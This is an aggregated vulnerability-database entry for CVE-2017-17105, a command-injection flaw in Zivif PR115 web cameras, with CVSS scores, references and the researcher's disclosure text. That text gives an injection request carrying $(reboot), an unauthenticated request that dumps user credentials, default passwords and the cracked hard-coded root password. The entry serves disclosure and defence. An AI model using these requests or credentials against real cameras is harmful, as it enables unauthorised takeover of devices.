Sign-up

ID

VAR-201712-0828


CVE

CVE-2017-17105


TITLE

Zivif Web Command injection vulnerability in camera

Trust: 0.8

sources: JVNDB: JVNDB-2017-011810

DESCRIPTION

Zivif PR115-204-P-RS V2.3.4.2103 and V4.7.4.2121 (and possibly in-between versions) web cameras are vulnerable to unauthenticated, blind remote command injection via CGI scripts used as part of the web interface, as demonstrated by a cgi-bin/iptest.cgi?cmd=iptest.cgi&-time="1504225666237"&-url=$(reboot) request. Zivif Web The camera contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. The ZivifPR115-204-P-RS is a network camera device. A remote command injection vulnerability exists in the ZivifPR115-204-P-RS2.3.4.2103 release. A remote attacker can exploit this vulnerability to inject arbitrary commands. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. Attack vector: Remote Authentication: None Researcher: Silas Cutler `p1nk` <silas.cutler@blacklistthisdomain.com> Release date: December 10, 2017 Full Disclosure: 90 days CVEs: CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 Vulnerable Device: Zivif PR115-204-P-RS Version: V2.3.4.2103 Timeline: 1 September 2017: Initial alerting to Zivif 1 September 2017: Zivif contact established. 3 September 2017: Details provided. 7 September 2017: Confirmation of vulnerabilities from Zivif 5 December 2017: Public note on Social Media CVE-2017-17105, CVE-2017-17106, and CVE-2017-17107 would be included in HackerStrip comic. 10 December 2017: This email -[Overview]- Implementation of access controls is Zivif cameras is severely lacking. As a result, CGI functions can be called directly, bypassing authentication checks. This was first identified with the following request (CVE-2017-17106) http://<Camera Address>/web/cgi-bin/hi3510/param.cgi?cmd=getuser Cameras respond to this with: var name0="admin"; var password0="admin"; var authLevel0="255"; var name1="guest"; var password1="guest"; var authLevel1="3"; var name2="admin2"; var password2="admin"; var authLevel2="3"; var name3=""; var password3=""; var authLevel3="3"; var name4=""; var password4=""; var authLevel4="3"; var name5=""; var password5=""; var authLevel5="3"; var name6=""; var password6=""; var authLevel6="3"; var name7=""; var password7=""; var authLevel7="3"; var name8=""; var password8=""; var authLevel8="0"; var name9=""; var password9=""; var authLevel9="0 Credentials are returned in cleartext to the requester. One last findings was the /etc/passwd file contains the following hard-coded entry (CVE-2017-17107): root:$1$xFoO/s3I$zRQPwLG2yX1biU31a2wxN/:0:0::/root:/bin/sh The encrypted password is cat1029. (none) login: root Password: Login incorrect (none) login: root Password: Welcome to SONIX. \u@\h:\W$ Because of the way the file system is structured, changing this password requires more work then running passwd. -[Note]- The hi3510 is shared with a couple other cameras I'm exploring. The motd saying /Welcome to SONIX/ has lead me to speculate parts of this firmware may be shared with other cameras. -Silas

Trust: 2.43

sources: NVD: CVE-2017-17105 // JVNDB: JVNDB-2017-011810 // CNVD: CNVD-2018-01360 // VULHUB: VHN-108094 // VULMON: CVE-2017-17105 // PACKETSTORM: 145386

IOT TAXONOMY

category:['Network device']sub_category: -

Trust: 0.6

sources: CNVD: CNVD-2018-01360

AFFECTED PRODUCTS

vendor:zivifmodel:pr115-204-p-rsscope:eqversion:2.3.4.2103

Trust: 3.0

vendor:zivifmodel:pr115-204-p-rsscope:eqversion:4.7.4.2121

Trust: 1.0

sources: CNVD: CNVD-2018-01360 // JVNDB: JVNDB-2017-011810 // CNNVD: CNNVD-201712-147 // NVD: CVE-2017-17105

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov: CVE-2017-17105
value: CRITICAL

Trust: 1.0

NVD: CVE-2017-17105
value: CRITICAL

Trust: 0.8

CNVD: CNVD-2018-01360
value: HIGH

Trust: 0.6

CNNVD: CNNVD-201712-147
value: CRITICAL

Trust: 0.6

VULHUB: VHN-108094
value: HIGH

Trust: 0.1

VULMON: CVE-2017-17105
value: HIGH

Trust: 0.1

nvd@nist.gov: CVE-2017-17105
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 1.9

CNVD: CNVD-2018-01360
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.6

VULHUB: VHN-108094
severity: HIGH
baseScore: 10.0
vectorString: AV:N/AC:L/AU:N/C:C/I:C/A:C
accessVector: NETWORK
accessComplexity: LOW
authentication: NONE
confidentialityImpact: COMPLETE
integrityImpact: COMPLETE
availabilityImpact: COMPLETE
exploitabilityScore: 10.0
impactScore: 10.0
acInsufInfo: NONE
obtainAllPrivilege: NONE
obtainUserPrivilege: NONE
obtainOtherPrivilege: NONE
userInteractionRequired: NONE
version: 2.0

Trust: 0.1

nvd@nist.gov: CVE-2017-17105
baseSeverity: CRITICAL
baseScore: 9.8
vectorString: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
attackVector: NETWORK
attackComplexity: LOW
privilegesRequired: NONE
userInteraction: NONE
scope: UNCHANGED
confidentialityImpact: HIGH
integrityImpact: HIGH
availabilityImpact: HIGH
exploitabilityScore: 3.9
impactScore: 5.9
version: 3.0

Trust: 1.8

sources: CNVD: CNVD-2018-01360 // VULHUB: VHN-108094 // VULMON: CVE-2017-17105 // JVNDB: JVNDB-2017-011810 // CNNVD: CNNVD-201712-147 // NVD: CVE-2017-17105

PROBLEMTYPE DATA

problemtype:CWE-78

Trust: 1.1

problemtype:CWE-77

Trust: 0.9

sources: VULHUB: VHN-108094 // JVNDB: JVNDB-2017-011810 // NVD: CVE-2017-17105

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201712-147

TYPE

operating system commend injection

Trust: 0.6

sources: CNNVD: CNNVD-201712-147

CONFIGURATIONS

sources:
            
            
            JVNDB: JVNDB-2017-011810

EXPLOIT AVAILABILITY
sources:
            
            
            VULHUB: VHN-108094

PATCH
title:Top Pageurl:http://zivif.com/
Trust: 0.8
sources:
            
            
            JVNDB: JVNDB-2017-011810

EXTERNAL IDS
db:NVDid:CVE-2017-17105
Trust: 3.3
db:PACKETSTORMid:145386
Trust: 3.3
db:PACKETSTORMid:158120
Trust: 1.8
db:JVNDBid:JVNDB-2017-011810
Trust: 0.8
db:CNNVDid:CNNVD-201712-147
Trust: 0.7
db:CNVDid:CNVD-2018-01360
Trust: 0.6
db:CXSECURITYid:WLB-2020060066
Trust: 0.6
db:VULHUBid:VHN-108094
Trust: 0.1
db:VULMONid:CVE-2017-17105
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2018-01360 // 
            
            
            
            VULHUB: VHN-108094 // 
            
            
            
            VULMON: CVE-2017-17105 // 
            
            
            
            JVNDB: JVNDB-2017-011810 // 
            
            
            
            PACKETSTORM: 145386 // 
            
            
            
            CNNVD: CNNVD-201712-147 // 
            
            
            
            NVD: CVE-2017-17105

REFERENCES
url:http://packetstormsecurity.com/files/145386/zivif-pr115-204-p-rs-2.3.4.2103-bypass-command-injection-hardcoded-password.html
Trust: 3.8
url:https://twitter.com/silascutler/status/938052460328968192
Trust: 2.6
url:http://packetstormsecurity.com/files/158120/zivif-camera-2.3.4.2103-iptest.cgi-blind-remote-command-execution.html
Trust: 1.9
url:http://seclists.org/fulldisclosure/2017/dec/42
Trust: 1.8
url:https://nvd.nist.gov/vuln/detail/cve-2017-17105
Trust: 0.9
url:https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-17105
Trust: 0.8
url:https://cxsecurity.com/issue/wlb-2020060066
Trust: 0.6
url:https://cwe.mitre.org/data/definitions/78.html
Trust: 0.1
url:https://nvd.nist.gov
Trust: 0.1
url:http://<camera
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2017-17107
Trust: 0.1
url:https://nvd.nist.gov/vuln/detail/cve-2017-17106
Trust: 0.1
sources:
            
            
            CNVD: CNVD-2018-01360 // 
            
            
            
            VULHUB: VHN-108094 // 
            
            
            
            VULMON: CVE-2017-17105 // 
            
            
            
            JVNDB: JVNDB-2017-011810 // 
            
            
            
            PACKETSTORM: 145386 // 
            
            
            
            CNNVD: CNNVD-201712-147 // 
            
            
            
            NVD: CVE-2017-17105

CREDITS
Silas Cutler
Trust: 0.7
sources:
            
            
            PACKETSTORM: 145386 // 
            
            
            
            CNNVD: CNNVD-201712-147

SOURCES
db:CNVDid:CNVD-2018-01360
db:VULHUBid:VHN-108094
db:VULMONid:CVE-2017-17105
db:JVNDBid:JVNDB-2017-011810
db:PACKETSTORMid:145386
db:CNNVDid:CNNVD-201712-147
db:NVDid:CVE-2017-17105

LAST UPDATE DATE
2024-08-14T14:33:18.587000+00:00

SOURCES UPDATE DATE
db:CNVDid:CNVD-2018-01360date:2018-01-19T00:00:00
db:VULHUBid:VHN-108094date:2020-06-16T00:00:00
db:VULMONid:CVE-2017-17105date:2020-06-16T00:00:00
db:JVNDBid:JVNDB-2017-011810date:2018-01-29T00:00:00
db:CNNVDid:CNNVD-201712-147date:2020-06-18T00:00:00
db:NVDid:CVE-2017-17105date:2020-06-16T22:15:10.037

SOURCES RELEASE DATE
db:CNVDid:CNVD-2018-01360date:2018-01-19T00:00:00
db:VULHUBid:VHN-108094date:2017-12-19T00:00:00
db:VULMONid:CVE-2017-17105date:2017-12-19T00:00:00
db:JVNDBid:JVNDB-2017-011810date:2018-01-29T00:00:00
db:PACKETSTORMid:145386date:2017-12-13T16:50:24
db:CNNVDid:CNNVD-201712-147date:2017-12-05T00:00:00
db:NVDid:CVE-2017-17105date:2017-12-19T02:29:41.550